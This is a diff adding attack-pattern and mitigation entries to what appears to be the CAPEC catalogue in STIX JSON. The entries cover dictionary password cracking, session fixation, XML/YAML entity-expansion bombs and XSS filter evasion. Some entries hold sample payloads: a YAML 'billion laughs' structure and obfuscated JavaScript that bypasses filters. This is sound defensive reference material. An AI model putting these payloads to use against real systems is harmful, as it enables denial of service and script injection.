"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A system user selects the word \"treacherous\" as their passwords believing that it would be very difficult to guess. The password-based dictionary attack is used to crack this password and gain access to the account.", + "\n The Cisco LEAP challenge/response authentication mechanism uses passwords in a way that is susceptible to dictionary attacks, which makes it easier for remote attackers to gain privileges via brute force password guessing attacks.\n Cisco LEAP is a mutual authentication algorithm that supports dynamic derivation of session keys. With Cisco LEAP, mutual authentication relies on a shared secret, the user's logon password (which is known by the client and the network), and is used to respond to challenges between the user and the Remote Authentication Dial-In User Service (RADIUS) server.\n Methods exist for someone to write a tool to launch an offline dictionary attack on password-based authentications that leverage Microsoft MS-CHAP, such as Cisco LEAP. The tool leverages large password lists to efficiently launch offline dictionary attacks against LEAP user accounts, collected through passive sniffing or active techniques.See also: CVE-2003-1096" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine application's/system's password policy: Determine the password policies of the target application/system.

    2. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks).

  2. Select dictionaries: Pick the dictionaries to be used in the attack (e.g. different languages, specific terminology, etc.)

    3. Techniques
    Select dictionary based on particular users' preferred languages.
    Select dictionary based on the application/system's supported languages.

  3. Determine username(s) to target: Determine username(s) whose passwords to crack.

    4. Techniques
    Obtain username(s) by sniffing network packets.
    Obtain username(s) by querying application/system (e.g. if upon a failed login attempt, the system indicates whether the entered username was valid or not)
    Obtain usernames from filesystem (e.g. list of directories in C:\\Documents and Settings\\ in Windows, and list in /etc/passwd in UNIX-like systems)

Exploit

  1. Use dictionary to crack passwords.: Use a password cracking tool that will leverage the dictionary to feed passwords to the system and see if they work.

    2. Techniques
    Try all words in the dictionary, as well as common misspellings of the words as passwords for the chosen username(s).
    Try common combinations of words in the dictionary, as well as common misspellings of the combinations as passwords for the chosen username(s).
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The system uses one factor password based authentication.", + "The system does not have a sound password policy that is being enforced.", + "The system does not implement an effective password throttling mechanism." + ], + "x_capec_resources_required": [ + "A machine with sufficient resources for the job (e.g. CPU, RAM, HD). Applicable dictionaries are required. Also a password cracking tool or a custom script that leverages the dictionary database to launch the attack." + ], + "x_capec_skills_required": { + "Low": "A variety of password cracking tools and dictionaries are available to launch this type of an attack." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Create a strong password policy and ensure that your system enforces this policy.", + "id": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-16-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0aa3c5ce-dade-4c9d-b9cb-cfd13a4fc7b0", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "target_ref": "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement an intelligent password throttling mechanism. Care must be taken to assure that these mechanisms do not excessively enable account lockout attacks such as CAPEC-2.", + "id": "course-of-action--36387909-c46a-4d0f-8954-bbc4c954c9a9", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-16-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6e58b5f0-7d1d-48bc-bbfd-a15472142005", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36387909-c46a-4d0f-8954-bbc4c954c9a9", + "target_ref": "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage multi-factor authentication for all authentication services.", + "id": "course-of-action--4e15baee-dc2c-4af0-bad4-f2a1fd8a7000", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-16-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--21bb6f85-66f5-41e1-b24b-9ad75b3f1526", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4e15baee-dc2c-4af0-bad4-f2a1fd8a7000", + "target_ref": "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Some APIs support scripting instructions as arguments. Methods that take scripted instructions (or references to scripted instructions) can be very flexible and powerful. However, if an attacker can specify the script that serves as input to these methods they can gain access to a great deal of functionality. For example, HTML pages support \n A similar example uses session ID as an argument of the URL.\n http://www.example.com/index.php/sessionid=0123456789\n Once the victim clicks the links, the attacker may be able to bypass authentication or piggy-back off some other authenticated victim's session.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Analyze and Understand Session IDs: The attacker finds that the targeted application use session credentials to identify legitimate users.

    2. Techniques
    An attacker makes many anonymous connections and records the session IDs.
    An attacker makes authorized connections and records the session tokens or credentials.

Experiment

  1. Create Session IDs.: Attackers craft messages containing their forged credentials in GET, POST request, HTTP headers or cookies.

    2. Techniques
    The attacker manipulates the HTTP request message and adds their forged session IDs in to the requests or cookies.

Exploit

  1. Abuse the Victim's Session Credentials: The attacker fixates falsified session ID to the victim when victim access the system. Once the victim has achieved a higher level of privilege, possibly by logging into the application, the attacker can now take over the session using the forged session identifier.

    2. Techniques
    The attacker loads the predefined or predicted session ID into their browser and browses to protected data or functionality.
    The attacker loads the predefined or predicted session ID into their software and utilizes functionality with the rights of the victim.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--012db73f-2f3c-49f3-bdf3-12ec3eee01ce", + "attack-pattern--7ee89c1f-50a5-42e6-abdb-6d8ba0349810" + ], + "x_capec_prerequisites": [ + "The targeted application must use session credentials to identify legitimate users. Session identifiers that remains unchanged when the privilege levels change. Predictable session identifiers." + ], + "x_capec_resources_required": [ + "Attackers may require tools to craft messages containing their forged credentials, and ability to send HTTP request to a web application." + ], + "x_capec_skills_required": { + "Medium": "Forge the session credential and reply the request." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Use session IDs that are difficult to guess or brute-force: One way for the attackers to obtain valid session IDs is by brute-forcing or guessing them. By choosing session identifiers that are sufficiently random, brute-forcing or guessing becomes very difficult.", + "id": "course-of-action--aba24572-8817-4d88-92bf-765eaa6ae508", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-196-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a7fe664e-53db-4afa-acf9-45a9386c846a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--aba24572-8817-4d88-92bf-765eaa6ae508", + "target_ref": "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Regenerate and destroy session identifiers when there is a change in the level of privilege: This ensures that even though a potential victim may have followed a link with a fixated identifier, a new one is issued when the level of privilege changes.", + "id": "course-of-action--9403f5e9-5529-4e19-8b52-23c80494dc87", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-196-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7122b06c-8e94-4304-88f8-5f9d5c620b25", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9403f5e9-5529-4e19-8b52-23c80494dc87", + "target_ref": "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary submits data to a target application which contains nested exponential data expansion to produce excessively large output. Many data format languages allow the definition of macro-like structures that can be used to simplify the creation of complex structures. However, this capability can be abused to create excessive demands on a processor's CPU and memory. A small number of nested expansions can result in an exponential growth in demands on memory.", + "external_references": [ + { + "external_id": "CAPEC-197", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/197.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-776", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/776.html" + }, + { + "description": "XML Entity Expansion", + "external_id": "44", + "source_name": "WASC", + "url": "http://projects.webappsec.org/XML-Entity-Expansion" + }, + { + "description": "Amit Klein, Multiple vendors XML parser (and SOAP/WebServices server) Denial of Service attack using DTD", + "external_id": "REF-64", + "source_name": "reference_from_CAPEC", + "url": "http://www.securityfocus.com/archive/1/303509" + }, + { + "description": "Pete Lindstrom, Attacking & Defending Web Services, 2002, SPiRE Security", + "external_id": "REF-65", + "source_name": "reference_from_CAPEC", + "url": "http://www.webtorials.com/main/comnet/cn2003/web-service/24.pdf" + }, + { + "description": "Elliotte Rusty Harold, Tip: Configure SAX parsers for secure processing, IBM developerWorks, 2005--05---27, IBM", + "external_id": "REF-66", + "source_name": "reference_from_CAPEC", + "url": "http://www.ibm.com/developerworks/xml/library/x-tipcfsx.html" + }, + { + "description": "Bryan Sullivan, XML Denial of Service Attacks and Defenses", + "external_id": "REF-67", + "source_name": "reference_from_CAPEC", + "url": "http://msdn.microsoft.com/en-us/magazine/ee335713.aspx" + }, + { + "description": "Bryan Sullivan, XML Denial of Service Attacks and Defenses", + "external_id": "REF-67", + "source_name": "reference_from_CAPEC", + "url": "http://msdn.microsoft.com/en-us/magazine/ee335713.aspx" + } + ], + "id": "attack-pattern--f36abc8a-043e-42c5-876d-a65fc0cddc1e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Exponential Data Expansion", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_alternate_terms": [ + "Billion Laughs Attack", + "XML Bomb", + "XML Entity Expansion (XEE)" + ], + "x_capec_can_follow_refs": [ + "attack-pattern--5cf3eacf-a0c6-4c59-9f97-4f677a90587a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (Denial of Service)", + "Resource Consumption (Denial of Service)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The most common example of this type of attack is the \"many laughs\" attack (sometimes called the 'billion laughs' attack). For example:\n \n ]>&lol9;\n This is well formed and valid XML according to the DTD. Each entity increases the number entities by a factor of 10. The line of XML containing lol9; expands out exponentially to a message with 10^9 entities. A small message of a few KBs in size can easily be expanded into a few GB of memory in the parser. By including 3 more entities similar to the lol9 entity in the above code to the DTD, the program could expand out over a TB as there will now be 10^12 entities. Depending on the robustness of the target machine, this can lead to resource depletion, application crash, or even the execution of arbitrary code through a buffer overflow.\n ", + "\n This example is similar, but uses YAML. This was used to attack Kubernetes [REF-686]\n a: &a [\"lol\",\"lol\",\"lol\",\"lol\",\"lol\",\"lol\",\"lol\",\"lol\",\"lol\"]b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: An adversary determines the input data stream that is being processed by a data parser that supports using subsitituion on the victim's side.

    2. Techniques
    Use an automated tool to record all instances of URLs to process requests.
    Use a browser to manually explore the website and analyze how the application processes requests.

Experiment

  1. Craft malicious payload: The adversary crafts a malicious message containing nested exponential expansion that completely uses up available server resources. See the \"Example Instances\" section for details on how to craft this malicious payload.

Exploit

  1. Send the message: Send the malicious crafted message to the target URL.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "This type of attack requires that the target must receive input but either fail to provide an upper limit for entity expansion or provide a limit that is so large that it does not preclude significant resource consumption." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "Ability to craft nested data expansion messages." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use libraries and templates that minimize unfiltered input. Use methods that limit entity expansion and throw exceptions on attempted entity expansion.", + "id": "course-of-action--7cdc228e-d1d1-40c4-b9c4-9e9f89b3df71", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-197-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0492ba63-8134-4235-a371-e1cf83184a85", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7cdc228e-d1d1-40c4-b9c4-9e9f89b3df71", + "target_ref": "attack-pattern--f36abc8a-043e-42c5-876d-a65fc0cddc1e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: For XML based data - disable altogether the use of inline DTD schemas when parsing XML objects. If a DTD must be used, normalize, filter and use an allowlist and parse with methods and routines that will detect entity expansion from untrusted sources.", + "id": "course-of-action--a2a17594-fbe4-4682-92b8-c64f405f7e3c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-197-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6b369dc5-7f0d-40cb-8412-64f171649546", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2a17594-fbe4-4682-92b8-c64f405f7e3c", + "target_ref": "attack-pattern--f36abc8a-043e-42c5-876d-a65fc0cddc1e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary distributes a link (or possibly some other query structure) with a request to a third party web server that is malformed and also contains a block of exploit code in order to have the exploit become live code in the resulting error page.", + "external_references": [ + { + "external_id": "CAPEC-198", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/198.html" + }, + { + "external_id": "CWE-81", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/81.html" + } + ], + "id": "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XSS Targeting Error Pages", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b" + ], + "x_capec_domains": [ + "Software", + "Software", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs as URL parameters: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application, looking for URLs which use parameters.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Cause application to return error page: The adversary uses the URLs gathered in the \"Explore\" phase as a target list and injects various common script payloads and special characters into the parameters to see if an error page occurs, and if the injected payload is executed by the error page.

    2. Techniques
    Use a list of XSS probe strings to inject script in parameters of known URLs. If possible, the probe strings contain a unique identifier.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.
    Use a list of HTML special characters to inject into parameters of known URLs and check if they caused errors

  2. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS through an error page, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

    3. Techniques
    Change a URL parameter to include a malicious script tag.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

    2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_extended_description": "\n When the third party web server receives the crafted request and notes the error it then creates an error message that echoes the malformed message, including the exploit. Doing this converts the exploit portion of the message into to valid language elements that are executed by the viewing browser. When a victim executes the query provided by the adversary the infected error message is returned including the exploit code which then runs in the victim's browser. XSS can result in execution of code as well as data leakage (e.g. session cookies can be sent to the attacker). This type of attack is especially dangerous since the exploit appears to come from the third party web server, who the victim may trust and hence be more vulnerable to deception.\n ", + "x_capec_prerequisites": [ + "A third party web server which fails to adequately sanitize messages sent in error pages.", + "The victim must be made to execute a query crafted by the adversary which results in the infected error report." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use libraries and templates that minimize unfiltered input.", + "id": "course-of-action--89b4089f-8b0c-4e66-9b1b-8d05f8cbaaf5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-198-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6ead6205-dacb-49ab-9007-3a8d39a3ea50", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--89b4089f-8b0c-4e66-9b1b-8d05f8cbaaf5", + "target_ref": "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Normalize, filter and use an allowlist for any input that will be used in error messages.", + "id": "course-of-action--c79cd2c1-58af-4951-8d6a-8767190e4ecd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-198-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d30e714c-2b9c-4a0d-95e1-7bf38e3f7c5e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c79cd2c1-58af-4951-8d6a-8767190e4ecd", + "target_ref": "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: The victim should configure the browser to minimize active content from untrusted sources.", + "id": "course-of-action--7a8e75aa-0acc-4307-99ae-181fbe26a03d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-198-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--201dd0ea-a13e-4039-a9c2-1b28e26c2560", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7a8e75aa-0acc-4307-99ae-181fbe26a03d", + "target_ref": "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses alternate forms of keywords or commands that result in the same action as the primary form but which may not be caught by filters. For example, many keywords are processed in a case insensitive manner. If the site's web filtering algorithm does not convert all tags into a consistent case before the comparison with forbidden keywords it is possible to bypass filters (e.g., incomplete black lists) by using an alternate case structure. For example, the \"script\" tag using the alternate forms of \"Script\" or \"ScRiPt\" may bypass filters where \"script\" is the only form tested. Other variants using different syntax representations are also possible as well as using pollution meta-characters or entities that are eventually ignored by the rendering engine. The attack can result in the execution of otherwise prohibited functionality.", + "external_references": [ + { + "external_id": "CAPEC-199", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/199.html" + }, + { + "external_id": "CWE-87", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/87.html" + }, + { + "description": "OWASP Cheatsheets, The Open Web Application Security Project (OWASP)", + "external_id": "REF-69", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/www-community/xss-filter-evasion-cheatsheet" + }, + { + "description": "OWASP Testing Guide (v2), The Open Web Application Security Project (OWASP)", + "external_id": "REF-70", + "source_name": "reference_from_CAPEC", + "url": "http://www.owasp.org/index.php/Testing_for_Cross_site_scripting" + }, + { + "description": "Non-alphanumeric XSS cheat sheet", + "external_id": "REF-71", + "source_name": "reference_from_CAPEC", + "url": "http://sla.ckers.org/forum/read.php?24,28687" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-72", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/Cross-Site+Scripting" + } + ], + "id": "attack-pattern--b703f007-6e24-4365-b5f7-c5d249253b33", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XSS Using Alternate Syntax", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software", + "Software", + "Software" + ], + "x_capec_example_instances": [ + "\n In this example, the adversary tries to get executed by the victim's browser. The target application employs regular expressions to make sure no script is being passed through the application to the web page; such a regular expression could be ((?i)script), and the application would replace all matches by this regex by the empty string. An adversary will then create a special payload to bypass this filter:\n alert(1)\n when the applications gets this input string, it will replace all \"script\" (case insensitive) by the empty string and the resulting input will be the desired vector by the adversary:\n \n In this example, we assume that the application needs to write a particular string in a client-side JavaScript context (e.g., ). For the adversary to execute the same payload as in the previous example, they would need to send alert(1) if there was no filtering. The application makes use of the following regular expression as filter\n ((\\w+)\\s*\\(.*\\)|alert|eval|function|document)\n and replaces all matches by the empty string. For example each occurrence of alert(), eval(), foo() or even the string \"alert\" would be stripped. An adversary will then create a special payload to bypass this filter:\n this['al' + 'ert'](1)\n when the applications gets this input string, it won't replace anything and this piece of JavaScript has exactly the same runtime meaning as alert(1). The adversary could also have used non-alphanumeric XSS vectors to bypass the filter; for example,\n ($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)\n would be executed by the JavaScript engine like alert(1) is.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

    2. Techniques
    Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
